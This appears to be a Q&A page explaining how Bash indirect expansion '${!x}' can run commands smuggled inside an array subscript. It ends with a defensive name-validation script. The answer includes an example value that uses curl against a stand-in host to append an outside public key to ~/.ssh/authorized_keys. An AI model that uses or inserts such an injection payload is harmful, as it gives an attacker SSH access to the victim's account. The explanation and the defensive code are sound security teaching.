Safety considerations for "${!x}" indirect expansion in Bash


Problem description

Suppose I have a variable, say x, that contains unknown, arbitrary data.

Is the following indirect expansion at risk of code injection or other forms of exploits?

ARBITRARY_COMMAND "${!x}"

I know there are cases where the way x is assigned for useful real-life scenarios may by itself introduce risks and need to be properly controlled or sanitized, but I am assuming here that x has been initialized in a way that makes no guarantee as to its value, yet is not exposed to exploits up to the expansion shown above.

Recommended answer

In short: YES, any automatic expansion of unknown data is potentially hazardous.

gniourf_gniourf's answer:

x='a[$(ls>&2)]'

When expanding ${!x}, Bash will expand ${a[$(ls>&2)]}, which is an array expansion, so the term inside the array key, namely $(ls>&2), will be expanded... and this will execute ls (with output to stderr so that we can all observe that ls is indeed executed).

For example, instead of ls you could have:

x='a[$(curl -s bad.us/pubkey >> ~/.ssh/authorized_keys)]'

Which when evaluated by ${!x} would append a potentially unfriendly public key to your authorized_keys file, which could allow an unfriendly person to ssh into your account.
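
One way to close the hole described in the answer above, as an added example that is not part of the original question or answer: accept only a plain identifier as the value of x before dereferencing it. The function names `is_plain_name` and `safe_deref` and the sample variables are assumptions made for this illustration.

```bash
#!/usr/bin/env bash
# Added example: check the name held in a variable before using ${!name}.

# True only for a plain identifier: [A-Za-z_][A-Za-z0-9_]*
# This rejects subscripts such as a[...], the form the answer above uses to
# carry a command substitution into the expansion.
is_plain_name() {
  local LC_ALL=C   # keep the bracket ranges ASCII-only
  case $1 in
    '' | [0-9]* | *[!A-Za-z0-9_]*) return 1 ;;
  esac
  return 0
}

# safe_deref NAME: print the value of the variable called NAME.
# Returns 2 if NAME is rejected, 1 if the variable is unset.
# "${!1}" is used instead of a local copy so that no local variable can
# shadow the caller's variable of the same name.
safe_deref() {
  if ! is_plain_name "$1"; then
    printf 'safe_deref: refusing name %q\n' "$1" >&2
    return 2
  fi
  [[ -n ${!1+set} ]] || return 1
  printf '%s\n' "${!1}"
}

# Constructed demo input: an ordinary name, then the subscript form from the answer.
demo_value='hello'
x=demo_value
safe_deref "$x"
x='a[$(ls>&2)]'
safe_deref "$x" || echo "rejected with status $?"
```

The check is on the name only; the value that the named variable holds is printed as data and is never re-expanded.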
